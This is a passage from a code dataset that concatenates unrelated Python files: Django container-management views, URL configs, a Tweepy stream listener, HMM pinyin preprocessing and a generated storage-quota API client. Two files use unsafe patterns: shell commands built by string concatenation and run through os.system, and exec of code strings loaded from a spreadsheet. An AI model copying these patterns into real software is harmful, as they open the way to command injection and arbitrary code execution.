for var in list:
if var.show_type != 1:
response.append(var)
return render(request, 'common/list.html', {'data':response})
'''
def startapp(request):
id = request.GET['id']
whereparam = {'id':id}
object = Container_list.objects.get(**whereparam)
if object.status == 0:
path = "sh /home/PEP.sh " + object.path + " start"
os.system(path)
object.status = 1
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
def stopapp(request):
id = request.GET['id']
whereparam = {'id': id}
object = Container_list.objects.get(**whereparam)
if object.status == 1:
path = "sh /home/PEP.sh " + object.path + " stop"
os.system(path)
object.status = 0
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
'''
def manageApp(request):
action = request.POST['action']
id = int(request.POST['id'])
list = Container_list.objects.all()
response = dict()
for var in list:
if var.show_type == 1 and var.id == id:
return HttpResponse(
JsonResponse({"status": "failed", "comment": "该镜像已经被删除!"}, content_type="application/json"))
if var.show_type == 1 :
continue
if var.status == 1 and action == 'start' and var.id != id:
return HttpResponse(JsonResponse({"status":"failed","comment":"用户一次只能申请一个练习环境。"}, content_type="application/json"))
if var.id == id:
if action == 'start' and var.status == 0:
path = "sh /home/PEP.sh " + var.path + " start"
os.system(path)
var.status = 1
var.save()
elif action == 'stop' and var.status == 1:
path = "sh /home/PEP.sh " + var.path + " stop"
os.system(path)
var.status=0
var.save()
return HttpResponse(JsonResponse({"status":"success"}, content_type="application/json"))
return HttpResponse(JsonResponse({"status":"failed","comment":"失败请重试!"}, content_type="application/json"))
|
[
"pav1,paulinsider@gmail.com"
] |
pav1,paulinsider@gmail.com
|
401fa3bf6245f4b4d4def26da033aa3a82b885bf
|
57588093c6ed6dff087d71073eabb061210bd5eb
|
/myproject/urls.py
|
22a7f73fecef274020ae45dcdcdc6d96f784f13a
|
[] |
no_license
|
python-ottawa/opag
|
a2249a0da49af586c01934f9cf9e6596815d8733
|
66ea38475974f0e0edf04c3e9b86e612fedf8fb8
|
refs/heads/master
| 2021-07-03T14:47:36.498972
| 2015-06-24T22:27:32
| 2015-06-24T22:27:32
| 35,083
| 2
| 1
| null | 2021-06-10T17:27:49
| 2008-07-18T01:11:44
|
HTML
|
UTF-8
|
Python
| false
| false
| 715
|
py
|
from django.conf.urls.defaults import *
from django.contrib import admin
from django.conf import settings
admin.autodiscover()
urlpatterns = patterns('',
# To serve static content in development.
# Admin access
(r'^admin/', include(admin.site.urls)),
# Default handler is the main app.
(r'', include('myproject.main.urls'))
)
if settings.DEVELOPMENT:
# If in development mode
urlpatterns += patterns('',
# To serve static content in development.
(r'^static/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.STATIC_ROOT}),
)
handler404 = 'myproject.main.views.notfound'
handler500 = 'myproject.main.views.servererror'
|
[
"msoulier@digitaltorque.ca"
] |
msoulier@digitaltorque.ca
|
03221d11ae596056771dd6a40155d30b9efb8bb4
|
7d98a40b425bfae9cac908d227a90e040300f3e8
|
/app/main/errors.py
|
5d2f11e1532ea3e234aa61423854b6769a8a9f4b
|
[
"MIT",
"ODbL-1.0"
] |
permissive
|
jmeydam/alternative-destinations
|
b999b340590fa0ceb162e5de1b2170e510affb31
|
dec000db45a8005ff5408bc9756ea13f821b52f1
|
refs/heads/master
| 2020-04-13T20:17:53.900399
| 2019-10-24T16:01:27
| 2019-10-24T16:01:27
| 163,426,383
| 0
| 0
|
MIT
| 2019-10-25T11:19:45
| 2018-12-28T15:52:02
|
Python
|
UTF-8
|
Python
| false
| false
| 253
|
py
|
from flask import render_template
from . import main
@main.app_errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@main.app_errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
|
[
"jmeydam@gmail.com"
] |
jmeydam@gmail.com
|
3230e906d4b1aa90eb08e3bde5029121942a2cbd
|
7f3d3d02c3ab6e14e72ba4852828071af37088b5
|
/unicorn/utils.py
|
28b212cd4e1e3a2979ad7dbf787622b52a3ff4c3
|
[
"MIT"
] |
permissive
|
phantasy-project/unicorn
|
cf28b936e2a11ba551724fda8ad7f72da129b661
|
25d790adb1c4390eb715249dc94423228997f3a4
|
refs/heads/master
| 2021-10-27T06:23:33.688585
| 2021-10-15T19:28:01
| 2021-10-15T19:28:01
| 150,592,912
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
# -*- coding: utf-8 -*-
import pickle
import codecs
import xlrd
import numpy as np
import sys
from collections import namedtuple
DATA_X_COL_IDX = 7
DATA_Y_COL_IDX = 8
UniFunc = namedtuple('UniFunc',
'name ename from_field to_field description args code code_str data_x data_y')
def pickle_obj(obj, coding='base64'):
"""Pickle object into string for being a REST parameter.
"""
return codecs.encode(pickle.dumps(obj), coding).decode()
class UnicornData(object):
"""Parsing data from external xlsx file.
Examples
--------
>>> f = 'data.xlsx'
>>> data = UnicornData(f)
>>> for f in data.functions:
>>> client.create(**f)
>>> # client is an AdminClient instance
>>>
"""
def __init__(self, xlsx_file, **kws):
try:
book = xlrd.open_workbook(xlsx_file)
except:
print("Open xlsx file failed.")
sys.exit(1)
self.data_x_col_idx = kws.get('data_x_col_idx', DATA_X_COL_IDX)
self.data_y_col_idx = kws.get('data_y_col_idx', DATA_Y_COL_IDX)
self.sheet = book.sheet_by_index(0)
self.ncols, self.nrows = self.sheet.ncols, self.sheet.nrows
self.header = [x.value for x in self.sheet.row(0)]
self.functions = self.generate_functions()
def generate_functions(self):
for ridx in range(1, self.nrows):
row = [v.value for v in self.sheet.row(ridx)]
x_raw = row[self.data_x_col_idx]
row[self.data_x_col_idx] = pickle_obj(
np.array([float(v) for v in x_raw.split()]))
y_raw = row[self.data_y_col_idx]
row[self.data_y_col_idx] = pickle_obj(
np.array([float(v) for v in y_raw.split()]))
f = dict(zip(self.header, row))
yield to_tuple(f)
def to_tuple(f):
"""Convert dict *f* to namedTuple.
"""
attr = {k: v for k, v in f.items()}
attr['code_str'] = attr['code']
attr['code'] = get_func(attr['code'])
return UniFunc(**attr)
def get_func(fstr):
"""Return function object from code.
"""
fncode, ns = compile(fstr, "<string>", "exec"), {}
exec(fncode, ns)
return ns.get('f')
def to_dict(d):
ret = {}
for k,v in d.items():
try:
ret[k] = float(v)
except:
ret[k] = v
return ret
|
[
"zhangt@frib.msu.edu"
] |
zhangt@frib.msu.edu
|
afa6b518a0c6de01cc70441c23e6ca16e0edd3b8
|
74d1757d8788d5892a8853b15749391fdf9c1a6a
|
/TaskAPI/TaskAPI/urls.py
|
4ba00b3c745c334f8fa19b18ffbc3b133f84f7e8
|
[] |
no_license
|
gogobook/TaskAPI
|
e3139a70f2f5257c83a590e13005ac4f7740f1d4
|
9b918659bba4aa562000219ef65dbce21a363f10
|
refs/heads/master
| 2020-06-30T23:46:14.955729
| 2016-11-23T09:31:13
| 2016-11-23T09:31:13
| 74,561,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
"""TaskAPI URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from django.conf.urls.static import static
from . import settings
from TaskApp import views
#Define API Routes
#router = .... #we will try with SimpleRouter
router = routers.SimpleRouter()
router.register(r'task', views.TaskViewSet)
urlpatterns = [
url(r'^',include(router.urls)),
url(r'^admin/', include(admin.site.urls)),
]+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
|
[
"O968041428@gmail.com"
] |
O968041428@gmail.com
|
53d12f540c00edd4490afc63f713584360966ba7
|
cec21b1d674aaf7d62d7730e637229577a2e27e2
|
/First_WebApp/counter.py
|
bb45d5e811601fba683b7e124370451ce0b1addd
|
[] |
no_license
|
arpitntripathi/first_WebApp
|
50028c0d792581f3c0639d07333d087035503e22
|
584095a61476bbc8c82d92e95526fa4008c788de
|
refs/heads/master
| 2022-12-23T23:52:01.117763
| 2020-09-12T20:34:29
| 2020-09-12T20:34:29
| 254,751,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
import operator
def count(article):
words = article.split()
word_count = len(words)
dict_words = {}
for word in words:
if word in dict_words:
dict_words[word] += 1
else:
dict_words[word] = 1
var_dict = sorted(dict_words.items(), key=operator.itemgetter(1), reverse=True)
return var_dict, word_count
|
[
"arpitnathtripathi@gmail.com"
] |
arpitnathtripathi@gmail.com
|
913a6ef26df5d59e656f52dc0d849452433fc3c5
|
1451a6fa3403a6b33c2adc31d94070ab16dca333
|
/avaliacao2/tweet_stream.py
|
9cfd7f240ef2a61b571df332ef38ba3e010927ef
|
[] |
no_license
|
lucaslioli/ufsm-deep-learning
|
b22a4ac5fa1604f04c9bd422b5b58f6e62577006
|
cf32547969d7ad7ad14235561df70a2a942ea9ec
|
refs/heads/master
| 2020-03-21T14:42:35.469428
| 2019-10-14T12:31:48
| 2019-10-14T12:31:48
| 138,671,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,784
|
py
|
import sys
import tweepy
import pickle as pkl
from authenticate import api_tokens
#override tweepy.StreamListener to add logic to on_status
class MyStreamListener(tweepy.StreamListener):
def on_status(self, status):
if(not status.retweeted and 'RT @' not in status.text[0:4] and status.lang == "pt"):
print("-----------------------------------------")
print("Lang:", status.lang)
print("Text:", status.text)
status.text = status.text.replace('\n', ' ').replace('\r', '')
record("unprocessed_tweets", status.text, status.id)
return True; # Don't kill the stream
def on_error(self, status_code):
print('Encountered error with status code:', status_code)
print("-----------------------------------------")
return True # Don't kill the stream
def on_exception(self, exception):
print('Exception: ', exception)
print("-----------------------------------------")
return True # Don't kill the stream
def on_timeout(self, timeout):
print('Timeout: ', timeout)
print("-----------------------------------------")
return True # Don't kill the stream
# Start the Stream Listener
def start_stream():
print ("---------- STREAMING STARTED -----------")
while True:
try:
myStream = tweepy.streaming.Stream(auth, MyStreamListener())
myStream.filter(track=["a", "e", "i", "o", "u"], stall_warnings=True)
except ValueError:
print('ERROR: Exeption occurred!' + ValueError)
print("-----------------------------------------")
continue
# Records the tweet ID and message into a file
def record(file_name, msg, id = ""):
# Using a txt file for testing purposes
with open("files/"+file_name+".txt", 'a') as f:
if(id != ""):
f.write(str(id) + " => " + msg + '\n')
else:
f.write(msg + '\n')
with open("files/"+file_name+".pkl", 'ab') as f:
pkl.dump(msg, f, pkl.HIGHEST_PROTOCOL)
# Records the tweet ID and message into a file
def record_array(file_name, arr):
# Using a txt file for testing purposes
with open("files/"+file_name+".txt", 'a') as f:
f.write(arr[0] + ", " + arr[1] + '\n')
with open("files/"+file_name+".pkl", 'ab') as f:
pkl.dump(arr, f, pkl.HIGHEST_PROTOCOL)
if __name__ == '__main__':
# Variables that contains the user credentials to access Twitter API
key = api_tokens()
# Tweepy API authentication
auth = tweepy.OAuthHandler(key['consumer_key'], key['consumer_secret'])
auth.set_access_token(key['access_token'], key['access_token_secret'])
# API authentication
api = tweepy.API(auth)
start_stream()
|
[
"loliveira@inf.ufsm.br"
] |
loliveira@inf.ufsm.br
|
5260c2df4a64f3a54d8b18ae12abc281fe8a4af7
|
06d09ea58ce1cfc0501ed598dbecda4273597567
|
/HMM/process_finally.py
|
601d32af19718cde39116fa35d48b669077234a8
|
[] |
no_license
|
SunflowerAries/Pinyin-to-Character
|
0c0abdbf7cc07d902f43ad9c3b8103e887a483e2
|
363faaf1b3f3fb3addce11f2b3d4bc9af62f588f
|
refs/heads/master
| 2020-11-30T08:28:48.738699
| 2020-01-12T14:20:05
| 2020-01-12T14:20:05
| 230,356,429
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,914
|
py
|
# coding: utf-8
import json, codecs
BASE_START_FILE = 'data/base_start.json'
BASE_EMISSION_FILE = 'data/base_emission.json'
BASE_TRANSITION_FILE = 'data/base_transition.json'
ALL_STATES_FILE = 'data/all_states.txt' # 所有的字
ALL_OBSERVATIONS_FILE = 'data/all_observations.txt' # 所有的拼音
PY2HZ_FILE = 'data/pinyin2hanzi.txt'
HZ2PY_FILE = 'hanzipinyin.txt'
FIN_PY2HZ_FILE = 'data/hmm_py2hz.json'
FIN_START_FILE = 'data/hmm_start.json'
FIN_EMISSION_FILE = 'data/hmm_emission.json'
FIN_TRANSITION_FILE = 'data/hmm_transition.json'
PINYIN_NUM = 411.
HANZI_NUM = 20903.
def writejson2file(obj, filename):
json.dump(obj, open(filename, 'w'), sort_keys=True)
def readdatafromfile(filename):
return json.load(open(filename, 'r'))
def gen_py2hz():
data = {}
with codecs.open(PY2HZ_FILE, 'r', 'utf-8') as fin:
while True:
line = fin.readline()
if not line: break
line = line.strip()
ls = line.split('=')
if len(ls) != 2:
raise Exception('invalid format')
py, chars = ls
py = py.strip()
chars = chars.strip()
if len(py)>0 and len(chars)>0:
data[py] = chars
writejson2file(data, FIN_PY2HZ_FILE)
def gen_start():
data = {'default': 1, 'data': None}
start = readdatafromfile(BASE_START_FILE)
count = HANZI_NUM
for hanzi in start:
count += start[hanzi]
for hanzi in start:
start[hanzi] = start[hanzi] / count
data['default'] = 1.0 / count
data['data'] = start
writejson2file(data, FIN_START_FILE)
def gen_emission():
"""
base_emission = {} #> {'泥': {'ni':1.0}, '了':{'liao':0.5, 'le':0.5}}
"""
data = {'default': 1.e-200, 'data': None}
emission = readdatafromfile(BASE_EMISSION_FILE)
for hanzi in emission:
num_sum = 0.
for pinyin in emission[hanzi]:
num_sum += emission[hanzi][pinyin]
for pinyin in emission[hanzi]:
emission[hanzi][pinyin] = emission[hanzi][pinyin] / num_sum
data['data'] = emission
writejson2file(data, FIN_EMISSION_FILE)
def gen_tramsition():
"""
{'你': {'好':10, '们':2}, '我': {}}
"""
data = {'default': 1./HANZI_NUM, 'data': None}
transition = readdatafromfile(BASE_TRANSITION_FILE)
for c1 in transition:
num_sum = HANZI_NUM # 默认每个字都有机会
for c2 in transition[c1]:
num_sum += transition[c1][c2]
for c2 in transition[c1]:
transition[c1][c2] = float(transition[c1][c2]+1) / num_sum
transition[c1]['default'] = 1./num_sum
data['data'] = transition
writejson2file(data, FIN_TRANSITION_FILE)
def main():
gen_py2hz()
gen_start()
gen_emission()
gen_tramsition()
if __name__ == '__main__':
main()
|
[
"17307130191@fudan.edu.cn"
] |
17307130191@fudan.edu.cn
|
f5a22a136e56bae2893f9a941bb1b6af17239b3a
|
17c266cef1c620d729cb8a9e3d9f47ce389c8c8f
|
/createclass.py
|
5021f3d1d2e81f759b077fa10c3f8fa9e62f953d
|
[] |
no_license
|
mubasil/flavortown
|
2cdc66492dfb46bbb78b8d42ff8a5b489db7a9a3
|
68b4ec2179782916fba0aa204255a75bba459b53
|
refs/heads/rory
| 2021-01-21T12:11:48.035094
| 2017-11-30T23:22:34
| 2017-11-30T23:22:34
| 102,047,698
| 0
| 2
| null | 2017-11-30T23:23:23
| 2017-08-31T21:39:02
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 745
|
py
|
import csv
import json
import os
classifiers = []
recipeClasses = ["Asian", "Mexican", "Italian"]
for recipeClass in recipeClasses:
directory = os.path.join(os.getcwd(), recipeClass)
for filename in os.listdir(directory):
with open(os.path.join(directory, filename)) as fileinfo:
data = json.loads(fileinfo.read())
allIngredients = ""
for datum in data['Ingredients']:
allIngredients = allIngredients + " " + datum
classifiers.append({'query':allIngredients, 'classifier':recipeClass})
writer = csv.writer(open('train.csv', 'w'))
for row in classifiers:
writer.writerow([unicode(row['query']).encode("utf-8"), unicode(row['classifier']).encode("utf-8")])
|
[
"mubasil@yahoo.com"
] |
mubasil@yahoo.com
|
3678b34fa02bf2efb255c7b1a52c9d39e07c3bfb
|
b78c255d1c8b917c21bf689f5f9153d765fbe195
|
/dogpack/apps/2d/advection/rotating_unst/plotq2_unst.py
|
7daa00269f64d5c3e12163634a8895661de93be2
|
[] |
no_license
|
smoe1/ImplicitExplicit
|
8be586bed84b1a661e5fe71f5b063dcd406643fa
|
2b9a2d54110ca0f787d4252b9a8cc6d64b23b08d
|
refs/heads/master
| 2016-09-08T02:39:48.371767
| 2015-09-15T21:15:08
| 2015-09-15T21:15:08
| 41,374,555
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
#----------------------------------------------------------
def plotq2_unst(outputdir, n1, m, meqn, NumPhysElems, NumPhysNodes,
xlow, xhigh, ylow, yhigh, time, x, y,
tnode, qsoln, xmid, ymid, qsoln_elem):
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
from math import pow
from math import cos
from math import sin
from math import pi
plt.figure(1)
plt.clf()
plt.gca().set_aspect('equal')
plt.gca().set_xlim([xlow,xhigh])
#plt.gca().set_ylim([ylow,yhigh])
p1=plt.tripcolor(x, y, tnode, qsoln[:,m], shading='faceted', vmin=0.0, vmax=1.0)
tmp1 = "".join(("q(",str(m+1),") at t = "))
tmp2 = "".join((tmp1,str(time)))
title = "".join((tmp2," [DoGPack]"))
plt.title(title)
plt.colorbar()
plt.draw()
x0 = -0.25*cos(2.0*pi*time) + 0.50
y0 = 0.25*sin(2.0*pi*time) + 0.50
r = np.zeros(NumPhysElems,float)
for i in range(0,NumPhysElems):
r[i] = sqrt(pow(xmid[i]-x0,2)+pow(ymid[i]-y0,2))
ind = r.argsort()
qscat_ex = np.zeros((NumPhysElems,meqn),float)
qex(NumPhysElems,meqn,r,qscat_ex)
err = np.linalg.norm(qscat_ex[:,m]-qsoln_elem[:,m])/np.linalg.norm(qscat_ex[:,m])
print ""
print " Error = ",'{:e}'.format(err)
print ""
plt.figure(2)
plt.clf()
plt.gca().set_aspect('auto')
plt.gca().set_xlim([0.0,0.5])
#plt.gca().set_ylim([0.0,1.0])
plt.plot(r[ind],qscat_ex[ind,m],'k-')
plt.plot(r[ind],qsoln_elem[ind,m],'bo')
tmp1 = "".join(("Scattor plot of q(",str(m+1),") at t = "))
tmp2 = "".join((tmp1,str(time)))
title = "".join((tmp2," [DoGPack]"))
plt.title(title)
plt.draw()
#----------------------------------------------------------
#----------------------------------------------------------
def qex(NumPhysElems,meqn,r,qscat_ex):
from math import pow
from math import cos
from math import pi
for i in range(NumPhysElems):
if (r[i]<0.2):
qscat_ex[i,0] = pow( cos(5.0/2.0*pi*r[i]) ,6)
#----------------------------------------------------------
|
[
"smoe@uw.edu"
] |
smoe@uw.edu
|
94540c0cfc7509d41aeaeedc64a11096d5b2616a
|
81d955c3ac886e690ceb01026ed769b1784dbef9
|
/purity_fb/purity_fb_1dot8/apis/quotas_groups_api.py
|
665498e5f3f9ea81a3c569698b958f1cb115c367
|
[
"Apache-2.0"
] |
permissive
|
etsangsplk/purity_fb_python_client
|
bc525ef1a18f6a79c1536cb4519a7efd58d09d89
|
0807a0fa2eab273bc08f73266d9cda9fa33b37bd
|
refs/heads/master
| 2020-06-03T05:49:03.015147
| 2019-05-16T06:11:40
| 2019-05-16T06:11:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,547
|
py
|
# coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0 - 1.8), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.8
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class QuotasGroupsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_group_quotas(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_quotas_with_http_info(**kwargs)
else:
(data) = self.create_group_quotas_with_http_info(**kwargs)
return data
def create_group_quotas_with_http_info(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_quotas(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_quotas_with_http_info(**kwargs)
else:
(data) = self.delete_group_quotas_with_http_info(**kwargs)
return data
def delete_group_quotas_with_http_info(self, **kwargs):
"""
Delete
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_group_quotas(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_group_quotas_with_http_info(**kwargs)
else:
(data) = self.list_group_quotas_with_http_info(**kwargs)
return data
def list_group_quotas_with_http_info(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'limit', 'sort', 'start', 'token', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
